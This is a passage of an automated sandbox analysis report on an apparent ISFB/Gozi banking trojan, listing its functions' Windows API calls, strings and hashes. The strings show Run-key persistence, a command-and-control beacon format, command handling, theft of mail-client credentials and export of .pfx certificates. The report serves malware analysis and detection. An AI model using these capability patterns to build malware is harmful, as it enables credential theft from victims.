                                                                                                                                          • Part of subcall function 004630DD: ReleaseMutex.KERNEL32(00000000,?,00000000,?,?,?), ref: 004631DB
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?), ref: 0045947E
                                                                                                                                          • Part of subcall function 0044AA04: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0044AA1E
                                                                                                                                          • Part of subcall function 0044AA04: CreateWaitableTimerA.KERNEL32(0046E0F8,?,?), ref: 0044AA3B
                                                                                                                                          • Part of subcall function 0044AA04: GetLastError.KERNEL32(?,?), ref: 0044AA4C
                                                                                                                                          • Part of subcall function 0044AA04: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 0044AA8C
                                                                                                                                          • Part of subcall function 0044AA04: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 0044AAAB
                                                                                                                                          • Part of subcall function 0044AA04: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 0044AAC1
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 004594E1
                                                                                                                                        • StrChrA.SHLWAPI(00000000,0000007C), ref: 00459555
                                                                                                                                        • StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 00459577
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004595B7
                                                                                                                                          • Part of subcall function 0044D658: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 0044D67A
                                                                                                                                          • Part of subcall function 0044D658: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?), ref: 0044D6AB
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 0045965D
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00459692
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 004596A1
                                                                                                                                        • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 004596CE
                                                                                                                                        • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 004596E8
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,Main,00000001,00000000,00000000,00000000,00000000,?,?), ref: 0045972E
                                                                                                                                        • _allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 00459776
                                                                                                                                        • SetWaitableTimer.KERNEL32(FF676980,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF,00000001,00000000,00000000,00000000,00000000,?), ref: 00459790
                                                                                                                                        • ReleaseMutex.KERNEL32(?), ref: 004597C3
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 004597D4
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 004597E3
                                                                                                                                          • Part of subcall function 00460ED0: RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00460EEE
                                                                                                                                          • Part of subcall function 00460ED0: RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?,74B5F710,00000000), ref: 00460F13
                                                                                                                                          • Part of subcall function 00460ED0: RtlAllocateHeap.NTDLL(00000000,?), ref: 00460F24
                                                                                                                                          • Part of subcall function 00460ED0: RegQueryValueExA.ADVAPI32(?,Main,00000000,?,00000000,?), ref: 00460F3F
                                                                                                                                          • Part of subcall function 00460ED0: HeapFree.KERNEL32(00000000,?), ref: 00460F5D
                                                                                                                                          • Part of subcall function 00460ED0: RegCloseKey.ADVAPI32(?), ref: 00460F66
                                                                                                                                        • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00459817
                                                                                                                                        • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 00459831
                                                                                                                                        • SwitchToThread.KERNEL32 ref: 00459833
                                                                                                                                        • ReleaseMutex.KERNEL32(?), ref: 0045983D
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0045987B
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00459886
                                                                                                                                        • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 004598A9
                                                                                                                                        • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 004598C3
                                                                                                                                        • SwitchToThread.KERNEL32 ref: 004598C5
                                                                                                                                        • ReleaseMutex.KERNEL32(?), ref: 004598CF
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 004598E4
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00459932
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00459946
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00459952
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0045995E
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0045996A
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00459976
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 00459982
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?), ref: 0045998E
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000,?,?,?,?,?,?,?), ref: 0045999D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$Heap$FreeMultipleMutexObjectsRelease_allmul$Thread$AllocateCreateErrorLastOpenQuerySwitchTimeValue$EventExitFileSystemTrimUser
                                                                                                                                        • String ID: Main
                                                                                                                                        • API String ID: 2416128729-521822810
                                                                                                                                        • Opcode ID: 9bf9cf786aebd76c5eeb6e151c01a5bd0551fec1f7149befbcc3324bbbd41d93
                                                                                                                                        • Instruction ID: 77d6e01b40ec59cb880de95e3e9647874ce16172ac887917745ff49650fea7fc
                                                                                                                                        • Opcode Fuzzy Hash: 9bf9cf786aebd76c5eeb6e151c01a5bd0551fec1f7149befbcc3324bbbd41d93
                                                                                                                                        • Instruction Fuzzy Hash: A3F18FB1908345EFDB11AF65CC8096BB7E9FB84355F000A3EF995922A1E7748C09CB5B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00457880, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 378memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(,00000000,?,?), ref: 004578D8
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00457972
                                                                                                                                        • lstrcpyn.KERNEL32(00000000,?,?), ref: 00457987
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 004579A3
                                                                                                                                        • StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,?,?), ref: 00457A7E
                                                                                                                                        • StrChrA.SHLWAPI(00000001,00000020), ref: 00457A8F
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00457AA3
                                                                                                                                        • memmove.NTDLL(?,?,00000001), ref: 00457AB3
                                                                                                                                        • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 00457AD6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 00457AFC
                                                                                                                                        • memcpy.NTDLL(00000000,?,?), ref: 00457B10
                                                                                                                                        • memcpy.NTDLL(?,?,?), ref: 00457B30
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00457B6C
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00457C32
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 00457C7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                                                                                                                        • String ID: $ gzip, deflate$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
                                                                                                                                        • API String ID: 3227826163-537135598
                                                                                                                                        • Opcode ID: f13d1dd5aa0df5d72d45bb47bd92842cdd7634870a037b8434aa5befcd1805f2
                                                                                                                                        • Instruction ID: 505926a4876935957d20306de62bc9f4fb0af1bef72137140dbf0b4545c8f20f
                                                                                                                                        • Opcode Fuzzy Hash: f13d1dd5aa0df5d72d45bb47bd92842cdd7634870a037b8434aa5befcd1805f2
                                                                                                                                        • Instruction Fuzzy Hash: C6D1AC31A00204EFDB15CFA8DC84B6E7BB5FF04301F14856AF805AB262D778AE55CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004441F5, Relevance: 42.3, APIs: 22, Strings: 2, Instructions: 284memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL ref: 0044422D
                                                                                                                                        • wsprintfA.USER32 ref: 00444290
                                                                                                                                        • wsprintfA.USER32 ref: 004442D9
                                                                                                                                        • wsprintfA.USER32 ref: 004442FD
                                                                                                                                        • lstrcat.KERNEL32(?,726F7426), ref: 00444337
                                                                                                                                        • wsprintfA.USER32 ref: 00444356
                                                                                                                                        • wsprintfA.USER32 ref: 0044436F
                                                                                                                                        • wsprintfA.USER32 ref: 00444393
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 004443B0
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 004443D1
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 004443F1
                                                                                                                                          • Part of subcall function 004599A4: lstrlen.KERNEL32(00000000,253D7325,74B481D0,77E2EEF0,77E2EB70,?,?,00444403,?,03BD8D60), ref: 004599CF
                                                                                                                                          • Part of subcall function 004599A4: lstrlen.KERNEL32(?,?,?,00444403,?,03BD8D60), ref: 004599D7
                                                                                                                                          • Part of subcall function 004599A4: strcpy.NTDLL ref: 004599EE
                                                                                                                                          • Part of subcall function 004599A4: lstrcat.KERNEL32(00000000,?), ref: 004599F9
                                                                                                                                          • Part of subcall function 004599A4: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00444403,?,03BD8D60), ref: 00459A16
                                                                                                                                        • StrTrimA.SHLWAPI(00000000,004683E4,?,03BD8D60), ref: 00444425
                                                                                                                                          • Part of subcall function 00441705: lstrlen.KERNEL32(?,74B481D0,77E2EEF0,00444439,00470449,?), ref: 00441711
                                                                                                                                          • Part of subcall function 00441705: lstrlen.KERNEL32(?), ref: 00441719
                                                                                                                                          • Part of subcall function 00441705: lstrcpy.KERNEL32(00000000,?), ref: 00441730
                                                                                                                                          • Part of subcall function 00441705: lstrcat.KERNEL32(00000000,?), ref: 0044173B
                                                                                                                                        • lstrcpy.KERNEL32(?,00000000), ref: 00444454
                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00444462
                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 0044446C
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 00444477
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 00444493
                                                                                                                                          • Part of subcall function 00453ED5: memset.NTDLL ref: 00453F0E
                                                                                                                                          • Part of subcall function 00453ED5: memcpy.NTDLL(?,?,00000090,00000000,00000000,0000009F,0000009F,?,00000090,?), ref: 00453F1A
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,03BD8D60,00000001), ref: 00444559
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00470449,?), ref: 0044456B
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,03BD8D60), ref: 0044457D
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0044458F
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 004445A1
                                                                                                                                        Strings
                                                                                                                                        • EMPTY, xrefs: 004441FF
                                                                                                                                        • version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 0044428A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpy$memcpymemsetstrcpy
                                                                                                                                        • String ID: EMPTY$version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
                                                                                                                                        • API String ID: 1483892062-304588751
                                                                                                                                        • Opcode ID: dc708a29bea9f7598b081620ff5ec4e13535f0f59e1fb848a76da6f4948b4210
                                                                                                                                        • Instruction ID: de4319cc9d82f5c85cb24cb4610d5fd74a816fa2ff46e1f538808ac1195bf624
                                                                                                                                        • Opcode Fuzzy Hash: dc708a29bea9f7598b081620ff5ec4e13535f0f59e1fb848a76da6f4948b4210
                                                                                                                                        • Instruction Fuzzy Hash: 7FB18771A04201AFEB01CF69DC40F5A7BE8FB88304F04092AF548D7261EAB4E919CB5F
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045E429, Relevance: 39.3, APIs: 26, Instructions: 258memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 0045E446
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0045E45F
                                                                                                                                        • wsprintfA.USER32 ref: 0045E4B2
                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0045E4BD
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0045E4C7
                                                                                                                                        • _aulldiv.NTDLL(?,?,?,?), ref: 0045E4D9
                                                                                                                                        • wsprintfA.USER32 ref: 0045E4EF
                                                                                                                                        • wsprintfA.USER32 ref: 0045E50D
                                                                                                                                        • wsprintfA.USER32 ref: 0045E524
                                                                                                                                        • wsprintfA.USER32 ref: 0045E545
                                                                                                                                        • wsprintfA.USER32 ref: 0045E57E
                                                                                                                                        • wsprintfA.USER32 ref: 0045E5A1
                                                                                                                                        • lstrcat.KERNEL32(?,726F7426), ref: 0045E5D6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 0045E5EF
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0045E5FF
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(03BD8D20), ref: 0045E613
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(03BD8D20), ref: 0045E631
                                                                                                                                        • StrTrimA.SHLWAPI(00000000,004683E4,?,03BD8D60), ref: 0045E665
                                                                                                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045E68F
                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 0045E699
                                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 0045E69D
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 0045E71A
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,5448002F,00000000), ref: 0045E729
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,03BD8D60), ref: 0045E738
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0045E749
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?), ref: 0045E75A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2878544442-0
                                                                                                                                        • Opcode ID: 0275b923ef2652926a688958f298337c7740775b1c04401950a92e790ed29309
                                                                                                                                        • Instruction ID: 0b44ee2c87c66441c542eb3c3a0b38cc962ab52cb0ecc3ed929d17f49fb4f54c
                                                                                                                                        • Opcode Fuzzy Hash: 0275b923ef2652926a688958f298337c7740775b1c04401950a92e790ed29309
                                                                                                                                        • Instruction Fuzzy Hash: D5A16071A00109EFDB01DFAADC84E9A3BA8EB08304F054426F908D7261FBB4D959DB5A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00446D73, Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 129memoryregistrythreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00446D8E
                                                                                                                                        • RtlEnterCriticalSection.NTDLL(00000000), ref: 00446DAB
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00446DFB
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00446E05
                                                                                                                                        • GetLastError.KERNEL32 ref: 00446E0F
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 00446E20
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00446E42
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 00446E79
                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00446E8D
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00446E96
                                                                                                                                        • SuspendThread.KERNEL32(?), ref: 00446EA5
                                                                                                                                        • CreateEventA.KERNEL32(0046E0F8,00000001,00000000), ref: 00446EB9
                                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 00446EC6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00446ECD
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00446EE0
                                                                                                                                        • ResumeThread.KERNEL32(?), ref: 00446F04
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00446D7F
                                                                                                                                        • zgF, xrefs: 00446EF1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$zgF
                                                                                                                                        • API String ID: 1011176505-1222981935
                                                                                                                                        • Opcode ID: 4edf481778c246af590faab15820bc468a0f9a7c8abc51967b83bf1b743f6e3d
                                                                                                                                        • Instruction ID: 64bd2b2413ed98e8c6653743ad0dd1b483a8eac964ea0f11da900c33c1c4ff20
                                                                                                                                        • Opcode Fuzzy Hash: 4edf481778c246af590faab15820bc468a0f9a7c8abc51967b83bf1b743f6e3d
                                                                                                                                        • Instruction Fuzzy Hash: D4419576D00119FFDB105F90DC888AEBBB9FB06304B12453AF501E2221EBB55D85DB5B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044BF7C, Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223memorystringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513A8
                                                                                                                                          • Part of subcall function 00451370: RtlAllocateHeap.NTDLL(00000000,?), ref: 004513BC
                                                                                                                                          • Part of subcall function 00451370: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,004431E8,Kill), ref: 004513D6
                                                                                                                                          • Part of subcall function 00451370: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,004431E8,Kill,?,?), ref: 00451400
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,LastTask,?,?), ref: 0044BFBC
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00010000,LastTask), ref: 0044BFDA
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000011A,00000000,00000000,?), ref: 0044C00B
                                                                                                                                        • HeapFree.KERNEL32(00000000,004683E4,0000011B,00000000,00000000,00000000,00000000,?,00000001,004683E4,00000002,?,?), ref: 0044C082
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,LastTask), ref: 0044C147
                                                                                                                                        • wsprintfA.USER32 ref: 0044C15B
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0044C166
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 0044C180
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,LastTask,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000001,004683E4,00000002,?), ref: 0044C1A2
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0044C1BD
                                                                                                                                        • wsprintfA.USER32 ref: 0044C1CD
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0044C1D8
                                                                                                                                          • Part of subcall function 00442520: lstrlen.KERNEL32(?,00000000,00000000,74B05520,?,?,?,00441568,0000010D,00000000,00000000), ref: 00442550
                                                                                                                                          • Part of subcall function 00442520: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00442566
                                                                                                                                          • Part of subcall function 00442520: memcpy.NTDLL(00000010,?,00000000,?,?,?,00441568,0000010D), ref: 0044259C
                                                                                                                                          • Part of subcall function 00442520: memcpy.NTDLL(00000010,00000000,00441568,?,?,?,00441568), ref: 004425B7
                                                                                                                                          • Part of subcall function 00442520: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 004425D5
                                                                                                                                          • Part of subcall function 00442520: GetLastError.KERNEL32(?,?,?,00441568), ref: 004425DF
                                                                                                                                          • Part of subcall function 00442520: HeapFree.KERNEL32(00000000,00000000,?,?,?,00441568), ref: 00442605
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 0044C1F2
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000001,00000000,?,00000001,004683E4,00000002,?,?), ref: 0044C202
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$Allocate$lstrlen$QueryValuememcpywsprintf$CallCloseErrorLastNamedPipe
                                                                                                                                        • String ID: Cmd %s processed: %u$Cmd %u parsing: %u$LastTask
                                                                                                                                        • API String ID: 3733591251-3332907627
                                                                                                                                        • Opcode ID: 3a29d44d501c23318bf3dcf1107d8d51eeb0861fb3933d3e8aee5761c686a721
                                                                                                                                        • Instruction ID: 70ed9e837be4787ce2028097134126aa3f2e0086bac78981c628847aec5c2871
                                                                                                                                        • Opcode Fuzzy Hash: 3a29d44d501c23318bf3dcf1107d8d51eeb0861fb3933d3e8aee5761c686a721
                                                                                                                                        • Instruction Fuzzy Hash: F1719F71D01119BFEB209F95DCC4DAFBB78FB08344F04052AF505A2261EBB95D85CB6A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00465418, Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 172stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,IMAP,Port,?,IMAP,Secure_Connection,?,IMAP,User_Name,?,IMAP,Server,00000000,00000000,00000000), ref: 004654F0
                                                                                                                                        • lstrcpyW.KERNEL32(00000000,00470708), ref: 00465508
                                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00465510
                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,0047045E,Password2,?,IMAP,Port,?,IMAP,Secure_Connection,?,IMAP,User_Name,?,IMAP,Server), ref: 00465555
                                                                                                                                        • memcpy.NTDLL(00000000,?,00000008,00000006,?,?,0044B7EA,?,00000001,?), ref: 004655AE
                                                                                                                                        • LocalFree.KERNEL32(?,00000006,?,?,0044B7EA,?,00000001,?), ref: 004655C5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                                                                                                        • String ID: HTTPMail$IMAP$P$POP3$Password2$Port$SMTP$Secure_Connection$Server$User_Name$zlF
                                                                                                                                        • API String ID: 3649579052-3706155206
                                                                                                                                        • Opcode ID: 02d9b3bfd9b58fa13fdbfad22317ad2e321725f51ac12310c5171961914c893d
                                                                                                                                        • Instruction ID: 91ddf3fb81f4fd804247ae99d35a595a997302ae1ebab1e60c2f780e49f6333b
                                                                                                                                        • Opcode Fuzzy Hash: 02d9b3bfd9b58fa13fdbfad22317ad2e321725f51ac12310c5171961914c893d
                                                                                                                                        • Instruction Fuzzy Hash: E251A371D00609ABCF109FA6CC499DF7BB9FF44305F14442BF506B2251EBB89945CBAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00461591, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 156memorystringfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlen.KERNEL32(?,?,00000000), ref: 004615A8
                                                                                                                                        • lstrlen.KERNEL32(?,?,00000000), ref: 004615AF
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 004615C6
                                                                                                                                        • lstrcpy.KERNEL32(00000000,?), ref: 004615D7
                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004615F3
                                                                                                                                        • lstrcat.KERNEL32(?,.pfx), ref: 004615FD
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0046160E
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 004616A6
                                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 004616D6
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000000), ref: 004616EF
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004616F9
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00461709
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00461724
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00461734
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                                                                                                                        • String ID: .pfx$ISFB$hF
                                                                                                                                        • API String ID: 333890978-2075936733
                                                                                                                                        • Opcode ID: 1f3b6f6b8237338597dfb3ea36e2d55eb26390818182df7e93eba9930feed84c
                                                                                                                                        • Instruction ID: 8ccddeb11dfe70dbb18e1ba751c94fb8fbea009a3860b05dd36ba0dbbb285b3b
                                                                                                                                        • Opcode Fuzzy Hash: 1f3b6f6b8237338597dfb3ea36e2d55eb26390818182df7e93eba9930feed84c
                                                                                                                                        • Instruction Fuzzy Hash: 3D51ADB6900208BFCB119FA4DC84CAE7B79FF08355B054436F905E3270EA719E45CBAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045304A, Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 85librarymemoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(WININET.DLL,?,00000000,00000000,?,?), ref: 00453063
                                                                                                                                        • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0045306D
                                                                                                                                        • LoadLibraryA.KERNEL32(ieframe), ref: 0045308F
                                                                                                                                        • LoadLibraryA.KERNEL32(ieui), ref: 00453096
                                                                                                                                        • LoadLibraryA.KERNEL32(mshtml), ref: 0045309D
                                                                                                                                        • LoadLibraryA.KERNEL32(inetcpl.cpl), ref: 004530A4
                                                                                                                                        • LoadLibraryA.KERNEL32(ieapfltr), ref: 004530AB
                                                                                                                                        • LoadLibraryA.KERNEL32(urlmon), ref: 004530B2
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,WININET.dll), ref: 0045313A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
